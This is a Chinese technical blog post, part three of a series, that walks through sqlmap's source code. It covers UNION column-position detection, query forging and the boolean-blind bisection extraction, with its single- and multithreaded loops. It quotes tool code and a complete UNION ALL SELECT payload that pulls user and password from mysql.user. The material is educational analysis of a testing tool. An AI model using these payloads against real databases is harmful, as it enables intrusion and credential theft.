sqlmap源码解读（3）

回顾

前两篇主要说了SQLMAP从main如何一步一步运行到action()函数，然后我对MySQL的版本识别和识别确认进行了具体的分析。其中inject.getValue函数至关重要，上篇对预处理expandAsteriskForColumns函数做了深入的分析，并以MySQL为例，对unionUse函数如何确认union注入的有效性和如何得出字段数的过程做了分析，最后分析了函数agent.concatQuery如何对payload做强转，到核心部分__unionPosition为止

unionPosition

函数代码不长，如下。注意传到这里的expression是经过强转的payload

例如SELECT user, password FROM mysql.user变成CONCAT('mMvPxc',IFNULL(CAST(user AS CHAR(10000)), ' '),'nXlgnR',IFNULL(CAST(password AS CHAR(10000)), ' '),'YnCzLl') FROM mysql.user

def __unionPosition(count, expression):
    logMsg  = "confirming inband sql injection on parameter "
    logMsg += "'%s'" % kb.injParameter
    logger.info(logMsg)

    # For each column of the table (# of NULL) perform a request using
    # the UNION ALL SELECT statement to test it the target url is
    # affected by an exploitable inband SQL injection vulnerability
    for exprPosition in range(0, kb.unionCount):
        # Prepare expression with delimiters
        randQuery = randomStr()
        randQueryProcessed = agent.concatQuery("\'%s\'" % randQuery)
        randQueryUnescaped = unescaper.unescape(randQueryProcessed)

        ......

        # Forge the inband SQL injection request
        query = agent.forgeInbandQuery(randQueryUnescaped, exprPosition)
        payload = agent.payload(newValue=query)

        # Perform the request
        resultPage = Request.queryPage(payload, content=True)
        count += 1

        # We have to assure that the randQuery value is not within the
        # HTML code of the result page because, for instance, it is there
        # when the query is wrong and the back-end DBMS is Microsoft SQL
        # server
        htmlParsed = htmlParser(resultPage, paths.ERRORS_XML)

        if randQuery in resultPage and not htmlParsed:
            setUnion(position=exprPosition)

            break

注意到agent.concatQuery函数传入的是随机字符串而不是语句，分析代码会走到下方这一步

输入随机串->CONCAT('随机串1',IFNULL(CAST(输入随机串 AS CHAR(10000)), ' '),'随机串2')

concatQuery = "CONCAT('%s',%s,'%s')" % (temp.start, concatQuery, temp.stop)

下面unescape函数会将字符串转为CHAR(X,Y,Z)的ASCII格式，if判断会将expression和随机串生成的randQueryUnescaped比较长度，将较短的补空格至较长的，作用后续分析

进入forgeInbandQuery函数

1.prefixQuery函数作用在上一篇分析过，判断注入的闭合符号，在这里添加到前缀

2.exprPosition是payload循环到的字段数索引

3.postfixQuery函数作用在上一篇分析过，是在payload后添加注释和AND语句

        inbandQuery = self.prefixQuery("UNION ALL SELECT ")

        if not exprPosition:
            exprPosition = kb.unionPosition

        for element in range(kb.unionCount):
            if element > 0:
                inbandQuery += ", "

            if element == exprPosition:
                if " FROM " in query:
                    conditionIndex = query.rindex(" FROM ")
                    inbandQuery += "%s" % query[:conditionIndex]
                else:
                    inbandQuery += "%s" % query
            else:
                inbandQuery += "NULL"

        if " FROM " in query:
            conditionIndex = query.rindex(" FROM ")
            inbandQuery += "%s" % query[conditionIndex:]

        inbandQuery = self.postfixQuery(inbandQuery, kb.unionComment)

        return inbandQuery

回顾之前内容，在forgeInbandQuery执行完后会做完下面这一系列的转换

SELECT user, password FROM mysql.user
CONCAT('mMvPxc',IFNULL(CAST(user AS CHAR(10000)), ' '),'nXlgnR',IFNULL(CAST(password AS CHAR(10000)), ' '),'YnCzLl') FROM mysql.user
CONCAT(CHAR(120,121,75,102,103,89),IFNULL(CAST(user AS CHAR(10000)), CHAR(32)),CHAR(106,98,66,73,109,81),IFNULL(CAST(password AS CHAR(10000)), CHAR(32)),CHAR(105,73,99,89,69,74)) FROM mysql.user
UNION ALL SELECT NULL, CONCAT(CHAR(120,121,75,102,103,89),IFNULL(CAST(user AS CHAR(10000)), CHAR(32)),CHAR(106,98,66,73,109,81),IFNULL(CAST(password AS CHAR(10000)), CHAR(32)),CHAR(105,73,99,89,69,74)), NULL FROM mysql.user-- AND 7488=7488

执行效果如图，查询结果的开头结尾以及分割的随机字符串一目了然，这里是显示在host栏，实际上当传入的exprPosition不一致时，会在各个栏都显示一次。大家都是做过渗透的人，为什么这样做应该显而易见的，前端不一定将所有参数返回，所以这个循环是为了测试具体回显的字段是哪一个

后续agent.payload函数将原始参数位置替换为payload

Request.queryPage(payload, content=True)函数在content参数为True时返回responseBody，默认false的情况下会返回responseBody的md5

尝试以HTML方式解析响应，如果发现其中有生成的随机字符串，认为成功回显

htmlParsed = htmlParser(resultPage, paths.ERRORS_XML)

if randQuery in resultPage and not htmlParsed:
    setUnion(position=exprPosition)

    break

if isinstance(kb.unionPosition, int):
    logMsg  = "the target url is affected by an exploitable "
    logMsg += "inband sql injection vulnerability"
    logger.info(logMsg)

进入setUnion函数简单看下，保存了状态，并将注入点保存至kb.unionPosition，因此上方的打印也会执行。最后回顾一下，这里的unionPosition就是exprPosition，也是遍历最早保存的kb.unionCount的索引，是UNION注入的字段总数，在上篇文章重点在说的就是如何确认kb.unionCount

    elif position:
        condition = (
                      not kb.resumedQueries or ( kb.resumedQueries.has_key(conf.url) and
                      ( not kb.resumedQueries[conf.url].has_key("Union position")
                      ) )
                    )

        if condition:
            dataToSessionFile("[%s][%s][%s][Union position][%s]\n" % (conf.url, kb.injPlace, conf.parameters[kb.injPlace], position))

        kb.unionPosition = position

是时候回到最初的unionUse函数了，继续看

1.forgeInbandQuery函数之前以及分析，进行UNION ALL SELECT的拼接，agent.payload修改参数位置

2.Request.queryPage(payload, content=True)参数content为true返回html页面

3.解析响应html页面，找到其中开头结尾两处随机字符串的值，使用resultPage[startPosition:endPosition]这样的分割得到真正需要的值（参考上图）

    # Forge the inband SQL injection request
    query = agent.forgeInbandQuery(expression)
    payload = agent.payload(newValue=query)

    logMsg = "query: %s" % query
    logger.info(logMsg)

    # Perform the request
    resultPage = Request.queryPage(payload, content=True)
    count += 1

    if temp.start not in resultPage or temp.stop not in resultPage:
        return

    duration = int(time.time() - start)

    logMsg = "performed %d queries in %d seconds" % (count, duration)
    logger.info(logMsg)

    # Parse the returned page to get the exact inband
    # sql injection output
    startPosition = resultPage.index(temp.start)
    endPosition = resultPage.rindex(temp.stop) + len(temp.stop)
    value = str(resultPage[startPosition:endPosition])

    return value

至此，inject.getValue的第一部分结束了

goInferenceProxy

有了第一部分的基础，看第二部分应该会轻松不少

这部分主要的功能是以盲注（应该是布尔盲注）手段获得结果的

开头三行

1.agent.prefixQuery出现过多次，将闭合符号拼接到payload前

2.temp.inference见xml

3.agent.postfixQuery出现过多次，在payload后加注释和AND语句

4.agent.payload出现过多次，将payload替换了原来请求参数的位置

    query          = agent.prefixQuery(temp.inference)
    query          = agent.postfixQuery(query)
    payload        = agent.payload(newValue=query)

      <inference query="AND ORD(MID((%s), %d, 1)) > %d"/>

getFields函数大家应该不陌生，通过一系列正则拿到值，比如这里的expressionFieldsList是SELECT之后的语句

例如SELECT A,B,C->return "A,B,C",[A,B,C]

def __getFieldsProxy(expression):
    _, _, _, expressionFields = agent.getFields(expression)
    expressionFieldsList = expressionFields.replace(", ", ",")
    expressionFieldsList = expressionFieldsList.split(",")

    return expressionFields, expressionFieldsList

后续有很长的一段代码，是执行用户自定义代码的逻辑。实际上我们使用sqlmap是用不到自己写sql语句的功能，个人认为这部分没必要分析，我们直接往后看

跟入__goInferenceFields的__goInference函数，删减部分代码。先从语义分析，尝试获得结果的长度，然后使用二分法查到了具体的结果

def __goInference(payload, expression):
    if ( conf.eta or conf.threads > 1 ) and kb.dbms:
        _, length, _ = queryOutputLength(expression, payload)
    else:
        length = None
    count, value = bisection(payload, expression, length=length)
    return value

bisection

跟入queryOutputLength函数，首先到xml中寻找语句

lengthQuery         = queries[kb.dbms].length

        <count query="COUNT(%s)"/>

字符串转为CHAR格式后也调用了二分法，两次的二分法区别在于第一个没传入length，将返回的length传入第二次二分法

lengthExprUnescaped = unescaper.unescape(lengthExpr)
count, length       = bisection(payload, lengthExprUnescaped)

跟入bisection函数，这四行其实都比较熟悉

1.fieldToCast是通过正则获取到的SELECT后所有内容

2.agent.nullAndCastField函数将”a”转为IFNULL(CAST(a AS CHAR(10000)), ' ')

3.将SELECT后原本的内容全替换为强转部分的

4.unescape将字符串转为CHAR(X,Y,Z)

_, _, _, fieldToCast = agent.getFields(expression)
nulledCastedField    = agent.nullAndCastField(fieldToCast)
expressionReplaced   = expression.replace(fieldToCast, nulledCastedField, 1)
expressionUnescaped  = unescaper.unescape(expressionReplaced)

后续较长部分代码是进度条渲染相关，这部分没必要研究，开源的库有不少。而且只是开一个线程做一下基本运算，实现起来不是很复杂。然后就是核心部分，使用单线程或多线程的盲注

首先看简单的，单线程所谓盲注

while True:
    index += 1
    charStart = time.time()
    val = getChar(index)
    if val == None:
        break
    value += val

跟入getChar函数

MAX和MIN的VALUE是ASCII对应的字符，准确来说应该是32-127为可显字符，queriesCount[0]是用来统计循环次数的。sqlmap所谓的这种盲注是通过LIMIT限制每次只查一个字符，此处idx是二分法处理参数的索引

回忆上文的payload

<inference query="AND ORD(MID((%s), %d, 1)) > %d"/>

例如username,password,other中，idx为1表示盲注username，最后一个limit参数是遍历猜测username的每一个字母，范围从0-127猜测。二分法的作用是加快username每个字符的猜测速度

当获取到result的md5之后，会和默认正常的页面的md5对比，如果相等说明payload的大于条件成立，需要进一步二分直到不成立，就可以确认出该字符精确的ASCII码，然后处理下一个字符

    def getChar(idx):
        maxValue = 127
        minValue = 0

        while (maxValue - minValue) != 1:
            queriesCount[0] += 1
            limit = ((maxValue + minValue) / 2)

            forgedPayload = payload % (expressionUnescaped, idx, limit)

            result = Request.queryPage(forgedPayload)

            if result == kb.defaultResult:
                minValue = limit
            else:
                maxValue = limit

            if (maxValue - minValue) == 1:
                if maxValue == 1:
                    return None
                else:
                    return chr(minValue + 1)

其实多线程这部分也没有什么难点，加锁即可

每调用idx都需要申请锁idxlock.acquire()，使用完释放锁idxlock.release()，终端窗口打印也是类似，需要申请和释放iolock

        def downloadThread():
            while True:
                idxlock.acquire()

                if index[0] >= length:
                    idxlock.release()
                    return

                index[0] += 1
                curidx = index[0]
                idxlock.release()

                charStart = time.time()
                val = getChar(curidx)

                if val == None:
                    raise sqlmapValueException, "Failed to get character at index %d (expected %d total)" % (curidx, length)

                value[curidx-1] = val

                if showEta:
                    etaProgressUpdate(time.time() - charStart, index[0])
                elif conf.verbose in ( 1, 2 ):
                    s = "".join([c or "_" for c in value])
                    iolock.acquire()
                    dataToStdout("\r[%s] [INFO] retrieved: %s" % (time.strftime("%X"), s))
                    iolock.release()

        # Start the threads
        for _ in range(numThreads):
            thread = threading.Thread(target=downloadThread)
            thread.start()
            threads.append(thread)

        # And wait for them to all finish
        for thread in threads:
            thread.join()

到这里我们就分析完inject.getValue原理了，下一篇文章将进行后续分析（其实最难的部分已经结束了）

（完）